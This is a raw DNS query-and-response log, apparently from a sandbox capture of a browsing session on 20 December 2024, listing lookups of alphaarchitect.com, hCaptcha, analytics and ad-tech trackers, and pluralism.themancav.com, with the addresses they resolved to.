                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:06.066183090 CET192.168.2.41.1.1.10xe26bStandard query (0)a.clickcertain.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:06.066390991 CET192.168.2.41.1.1.10x7e6bStandard query (0)a.clickcertain.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:06.075661898 CET192.168.2.41.1.1.10x4a81Standard query (0)www.printfriendly.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:06.075853109 CET192.168.2.41.1.1.10xd0e0Standard query (0)www.printfriendly.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.707350969 CET192.168.2.41.1.1.10x596cStandard query (0)t.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.707712889 CET192.168.2.41.1.1.10x5e81Standard query (0)t.co65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.734210968 CET192.168.2.41.1.1.10x7f4eStandard query (0)analytics.twitter.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.734513044 CET192.168.2.41.1.1.10x4d83Standard query (0)analytics.twitter.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.018512964 CET192.168.2.41.1.1.10x280Standard query (0)pluralism.themancav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.018691063 CET192.168.2.41.1.1.10xef19Standard query (0)pluralism.themancav.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.169600964 CET192.168.2.41.1.1.10xc6d2Standard query (0)analytics.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.169809103 CET192.168.2.41.1.1.10xf661Standard query (0)analytics.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.170701027 CET192.168.2.41.1.1.10x3a65Standard query (0)stats.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.170914888 CET192.168.2.41.1.1.10xef30Standard query (0)stats.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.203352928 CET192.168.2.41.1.1.10x9655Standard query (0)td.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.203464031 CET192.168.2.41.1.1.10xdb5Standard query (0)td.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:09.638499022 CET192.168.2.41.1.1.10x5f8fStandard query (0)t.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:09.638588905 CET192.168.2.41.1.1.10x3565Standard query (0)t.co65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:10.052982092 CET192.168.2.41.1.1.10xf822Standard query (0)analytics.twitter.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:10.053174019 CET192.168.2.41.1.1.10x33e4Standard query (0)analytics.twitter.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:10.075331926 CET192.168.2.41.1.1.10xe6a2Standard query (0)a.clickcertain.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:10.075495005 CET192.168.2.41.1.1.10x64b7Standard query (0)a.clickcertain.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:10.088330030 CET192.168.2.41.1.1.10x61e3Standard query (0)a.clickcertain.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:10.088516951 CET192.168.2.41.1.1.10x63dcStandard query (0)a.clickcertain.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.623859882 CET192.168.2.41.1.1.10x67e6Standard query (0)js.hcaptcha.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.624042988 CET192.168.2.41.1.1.10xc5fbStandard query (0)js.hcaptcha.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.765525103 CET192.168.2.41.1.1.10x542eStandard query (0)a.usbrowserspeed.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.765887022 CET192.168.2.41.1.1.10x5a53Standard query (0)a.usbrowserspeed.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.767818928 CET192.168.2.41.1.1.10x8524Standard query (0)tag.trovo-tag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.768074989 CET192.168.2.41.1.1.10x673fStandard query (0)tag.trovo-tag.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.770945072 CET192.168.2.41.1.1.10x7e92Standard query (0)match.prod.bidr.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.771665096 CET192.168.2.41.1.1.10xb121Standard query (0)match.prod.bidr.io65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.838198900 CET192.168.2.41.1.1.10xd73fStandard query (0)pluralism.themancav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.838599920 CET192.168.2.41.1.1.10xd66Standard query (0)pluralism.themancav.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:14.058145046 CET192.168.2.41.1.1.10x37a5Standard query (0)js.hcaptcha.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:14.058239937 CET192.168.2.41.1.1.10xcd3fStandard query (0)js.hcaptcha.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:14.087016106 CET192.168.2.41.1.1.10xa214Standard query (0)newassets.hcaptcha.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:14.087240934 CET192.168.2.41.1.1.10xd0edStandard query (0)newassets.hcaptcha.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:14.553973913 CET192.168.2.41.1.1.10xdcbdStandard query (0)pixel.tapad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:14.554157972 CET192.168.2.41.1.1.10x722cStandard query (0)pixel.tapad.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:14.563503981 CET192.168.2.41.1.1.10x3daStandard query (0)i.liadm.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:14.563647985 CET192.168.2.41.1.1.10x6735Standard query (0)i.liadm.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:15.219377041 CET192.168.2.41.1.1.10x1d9eStandard query (0)tag.trovo-tag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:15.219546080 CET192.168.2.41.1.1.10xf7faStandard query (0)tag.trovo-tag.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:17.426758051 CET192.168.2.41.1.1.10x725bStandard query (0)api2.hcaptcha.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:17.428675890 CET192.168.2.41.1.1.10x4f35Standard query (0)api2.hcaptcha.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:17.433950901 CET192.168.2.41.1.1.10x30b4Standard query (0)api.hcaptcha.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:17.434258938 CET192.168.2.41.1.1.10x55e6Standard query (0)api.hcaptcha.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:18.047545910 CET192.168.2.41.1.1.10x3e33Standard query (0)match.adsrvr.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:18.047744036 CET192.168.2.41.1.1.10x4ae5Standard query (0)match.adsrvr.org65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.348033905 CET192.168.2.41.1.1.10x9dafStandard query (0)api.hcaptcha.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.348299026 CET192.168.2.41.1.1.10xcfabStandard query (0)api.hcaptcha.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.348897934 CET192.168.2.41.1.1.10x433aStandard query (0)api2.hcaptcha.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.349111080 CET192.168.2.41.1.1.10xec14Standard query (0)api2.hcaptcha.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.615345001 CET192.168.2.41.1.1.10x351Standard query (0)thrtle.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.615597010 CET192.168.2.41.1.1.10x7643Standard query (0)thrtle.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.971908092 CET192.168.2.41.1.1.10xc7abStandard query (0)pluralism.themancav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.972208023 CET192.168.2.41.1.1.10xa605Standard query (0)pluralism.themancav.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:35.427082062 CET1.1.1.1192.168.2.40x71efNo error (0)www.google.com142.250.181.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:35.427484035 CET1.1.1.1192.168.2.40xa2f0No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:36.935388088 CET1.1.1.1192.168.2.40x4e3fNo error (0)alphaarchitect.com141.193.213.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:36.935388088 CET1.1.1.1192.168.2.40x4e3fNo error (0)alphaarchitect.com141.193.213.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.602514982 CET1.1.1.1192.168.2.40x7e38No error (0)cdn.printfriendly.comprintfriendly.b-cdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.603410006 CET1.1.1.1192.168.2.40x2bf2No error (0)hcaptcha.com104.19.230.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.603410006 CET1.1.1.1192.168.2.40x2bf2No error (0)hcaptcha.com104.19.229.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.603991032 CET1.1.1.1192.168.2.40xc61dNo error (0)hcaptcha.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.680023909 CET1.1.1.1192.168.2.40xbe2cNo error (0)cdn.printfriendly.comprintfriendly.b-cdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:39.680023909 CET1.1.1.1192.168.2.40xbe2cNo error (0)printfriendly.b-cdn.net89.35.237.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:41.813927889 CET1.1.1.1192.168.2.40xcab9No error (0)alphaarchitect.com141.193.213.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:41.813927889 CET1.1.1.1192.168.2.40xcab9No error (0)alphaarchitect.com141.193.213.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:42.266273022 CET1.1.1.1192.168.2.40x8f81No error (0)cdn.printfriendly.comprintfriendly.b-cdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:42.266273022 CET1.1.1.1192.168.2.40x8f81No error (0)printfriendly.b-cdn.net89.35.237.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:42.269167900 CET1.1.1.1192.168.2.40xa208No error (0)cdn.printfriendly.comprintfriendly.b-cdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.306309938 CET1.1.1.1192.168.2.40xd548No error (0)a.remarketstats.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.306375027 CET1.1.1.1192.168.2.40x91efNo error (0)a.remarketstats.com104.26.3.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.306375027 CET1.1.1.1192.168.2.40x91efNo error (0)a.remarketstats.com104.26.2.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:47.306375027 CET1.1.1.1192.168.2.40x91efNo error (0)a.remarketstats.com172.67.69.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.239510059 CET1.1.1.1192.168.2.40xf0f6No error (0)a.remarketstats.com172.67.69.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.239510059 CET1.1.1.1192.168.2.40xf0f6No error (0)a.remarketstats.com104.26.2.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.239510059 CET1.1.1.1192.168.2.40xf0f6No error (0)a.remarketstats.com104.26.3.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:44:49.242153883 CET1.1.1.1192.168.2.40x2faaNo error (0)a.remarketstats.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.381958961 CET1.1.1.1192.168.2.40xdc8No error (0)static.ads-twitter.complatform.twitter.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.381958961 CET1.1.1.1192.168.2.40xdc8No error (0)platform.twitter.map.fastly.net199.232.168.157A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.382661104 CET1.1.1.1192.168.2.40xfb1eNo error (0)static.ads-twitter.complatform.twitter.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.299993992 CET1.1.1.1192.168.2.40x9e24No error (0)www.printfriendly.com104.26.8.127A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.299993992 CET1.1.1.1192.168.2.40x9e24No error (0)www.printfriendly.com104.26.9.127A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.299993992 CET1.1.1.1192.168.2.40x9e24No error (0)www.printfriendly.com172.67.73.115A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.407221079 CET1.1.1.1192.168.2.40x93cdNo error (0)www.printfriendly.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.958632946 CET1.1.1.1192.168.2.40x23edNo error (0)static.ads-twitter.complatform.twitter.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:04.958632946 CET1.1.1.1192.168.2.40x23edNo error (0)platform.twitter.map.fastly.net199.232.168.157A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:05.052777052 CET1.1.1.1192.168.2.40x32cbNo error (0)static.ads-twitter.complatform.twitter.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:06.213726997 CET1.1.1.1192.168.2.40x4a81No error (0)www.printfriendly.com104.26.8.127A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:06.213726997 CET1.1.1.1192.168.2.40x4a81No error (0)www.printfriendly.com104.26.9.127A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:06.213726997 CET1.1.1.1192.168.2.40x4a81No error (0)www.printfriendly.com172.67.73.115A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:06.214699984 CET1.1.1.1192.168.2.40xd0e0No error (0)www.printfriendly.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:06.465539932 CET1.1.1.1192.168.2.40x7e6bNo error (0)a.clickcertain.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:06.465579033 CET1.1.1.1192.168.2.40xe26bNo error (0)a.clickcertain.com172.67.74.207A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:06.465579033 CET1.1.1.1192.168.2.40xe26bNo error (0)a.clickcertain.com104.26.9.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:06.465579033 CET1.1.1.1192.168.2.40xe26bNo error (0)a.clickcertain.com104.26.8.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.844108105 CET1.1.1.1192.168.2.40x596cNo error (0)t.co162.159.140.229A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.871747017 CET1.1.1.1192.168.2.40x7f4eNo error (0)analytics.twitter.comads.twitter.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.871747017 CET1.1.1.1192.168.2.40x7f4eNo error (0)ads.twitter.coms.twitter.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.871747017 CET1.1.1.1192.168.2.40x7f4eNo error (0)s.twitter.com104.244.42.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.873437881 CET1.1.1.1192.168.2.40x4d83No error (0)analytics.twitter.comads.twitter.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:07.873437881 CET1.1.1.1192.168.2.40x4d83No error (0)ads.twitter.coms.twitter.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.306566000 CET1.1.1.1192.168.2.40xc6d2No error (0)analytics.google.com172.217.171.238A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.308314085 CET1.1.1.1192.168.2.40xf661No error (0)analytics.google.comanalytics-alv.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.313848019 CET1.1.1.1192.168.2.40x3a65No error (0)stats.g.doubleclick.net64.233.167.156A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.313848019 CET1.1.1.1192.168.2.40x3a65No error (0)stats.g.doubleclick.net64.233.167.154A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.313848019 CET1.1.1.1192.168.2.40x3a65No error (0)stats.g.doubleclick.net64.233.167.157A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.313848019 CET1.1.1.1192.168.2.40x3a65No error (0)stats.g.doubleclick.net64.233.167.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.340276957 CET1.1.1.1192.168.2.40x9655No error (0)td.doubleclick.net172.217.19.194A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:08.343370914 CET1.1.1.1192.168.2.40x280No error (0)pluralism.themancav.com62.60.154.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:09.784017086 CET1.1.1.1192.168.2.40x5f8fNo error (0)t.co162.159.140.229A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:10.190299988 CET1.1.1.1192.168.2.40xf822No error (0)analytics.twitter.comads.twitter.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:10.190299988 CET1.1.1.1192.168.2.40xf822No error (0)ads.twitter.coms.twitter.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:10.190299988 CET1.1.1.1192.168.2.40xf822No error (0)s.twitter.com104.244.42.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:10.190332890 CET1.1.1.1192.168.2.40x33e4No error (0)analytics.twitter.comads.twitter.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:10.190332890 CET1.1.1.1192.168.2.40x33e4No error (0)ads.twitter.coms.twitter.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:10.215621948 CET1.1.1.1192.168.2.40x64b7No error (0)a.clickcertain.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:10.215797901 CET1.1.1.1192.168.2.40xe6a2No error (0)a.clickcertain.com104.26.8.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:10.215797901 CET1.1.1.1192.168.2.40xe6a2No error (0)a.clickcertain.com104.26.9.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:10.215797901 CET1.1.1.1192.168.2.40xe6a2No error (0)a.clickcertain.com172.67.74.207A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:10.225584030 CET1.1.1.1192.168.2.40x63dcNo error (0)a.clickcertain.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:10.340363026 CET1.1.1.1192.168.2.40x61e3No error (0)a.clickcertain.com104.26.8.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:10.340363026 CET1.1.1.1192.168.2.40x61e3No error (0)a.clickcertain.com172.67.74.207A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:10.340363026 CET1.1.1.1192.168.2.40x61e3No error (0)a.clickcertain.com104.26.9.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.761491060 CET1.1.1.1192.168.2.40xc5fbNo error (0)js.hcaptcha.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.762197018 CET1.1.1.1192.168.2.40x67e6No error (0)js.hcaptcha.com104.19.229.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:11.762197018 CET1.1.1.1192.168.2.40x67e6No error (0)js.hcaptcha.com104.19.230.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.908478022 CET1.1.1.1192.168.2.40x7e92No error (0)match.prod.bidr.io34.249.70.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.908478022 CET1.1.1.1192.168.2.40x7e92No error (0)match.prod.bidr.io34.252.79.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.908478022 CET1.1.1.1192.168.2.40x7e92No error (0)match.prod.bidr.io52.30.92.87A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.908478022 CET1.1.1.1192.168.2.40x7e92No error (0)match.prod.bidr.io52.17.184.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.908478022 CET1.1.1.1192.168.2.40x7e92No error (0)match.prod.bidr.io52.48.57.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.908478022 CET1.1.1.1192.168.2.40x7e92No error (0)match.prod.bidr.io54.154.177.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:12.908478022 CET1.1.1.1192.168.2.40x7e92No error (0)match.prod.bidr.io63.32.181.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.056216002 CET1.1.1.1192.168.2.40x673fNo error (0)tag.trovo-tag.comd1fdcqniejar0f.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.069957972 CET1.1.1.1192.168.2.40x8524No error (0)tag.trovo-tag.comd1fdcqniejar0f.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.069957972 CET1.1.1.1192.168.2.40x8524No error (0)d1fdcqniejar0f.cloudfront.net3.164.85.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.069957972 CET1.1.1.1192.168.2.40x8524No error (0)d1fdcqniejar0f.cloudfront.net3.164.85.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.069957972 CET1.1.1.1192.168.2.40x8524No error (0)d1fdcqniejar0f.cloudfront.net3.164.85.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.069957972 CET1.1.1.1192.168.2.40x8524No error (0)d1fdcqniejar0f.cloudfront.net3.164.85.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.372644901 CET1.1.1.1192.168.2.40x542eNo error (0)a.usbrowserspeed.comcookiesync-446990137.us-west-2.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.372644901 CET1.1.1.1192.168.2.40x542eNo error (0)cookiesync-446990137.us-west-2.elb.amazonaws.com54.149.202.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.372644901 CET1.1.1.1192.168.2.40x542eNo error (0)cookiesync-446990137.us-west-2.elb.amazonaws.com52.12.66.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.372644901 CET1.1.1.1192.168.2.40x542eNo error (0)cookiesync-446990137.us-west-2.elb.amazonaws.com52.11.244.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.372644901 CET1.1.1.1192.168.2.40x542eNo error (0)cookiesync-446990137.us-west-2.elb.amazonaws.com44.235.193.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.373660088 CET1.1.1.1192.168.2.40x5a53No error (0)a.usbrowserspeed.comcookiesync-446990137.us-west-2.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:13.976710081 CET1.1.1.1192.168.2.40xd73fNo error (0)pluralism.themancav.com62.60.154.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:14.196278095 CET1.1.1.1192.168.2.40xcd3fNo error (0)js.hcaptcha.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:14.197556019 CET1.1.1.1192.168.2.40x37a5No error (0)js.hcaptcha.com104.19.230.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:14.197556019 CET1.1.1.1192.168.2.40x37a5No error (0)js.hcaptcha.com104.19.229.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:14.226365089 CET1.1.1.1192.168.2.40xa214No error (0)newassets.hcaptcha.com104.19.230.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:14.226365089 CET1.1.1.1192.168.2.40xa214No error (0)newassets.hcaptcha.com104.19.229.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:14.230604887 CET1.1.1.1192.168.2.40xd0edNo error (0)newassets.hcaptcha.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:14.692636013 CET1.1.1.1192.168.2.40xdcbdNo error (0)pixel.tapad.com34.111.113.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:14.701572895 CET1.1.1.1192.168.2.40x3daNo error (0)i.liadm.comidaas-ext.cph.liveintent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:14.701572895 CET1.1.1.1192.168.2.40x3daNo error (0)idaas-ext.cph.liveintent.com3.225.89.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:14.701572895 CET1.1.1.1192.168.2.40x3daNo error (0)idaas-ext.cph.liveintent.com35.173.214.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:14.701572895 CET1.1.1.1192.168.2.40x3daNo error (0)idaas-ext.cph.liveintent.com3.218.55.33A (IP address)IN (0x0001)false
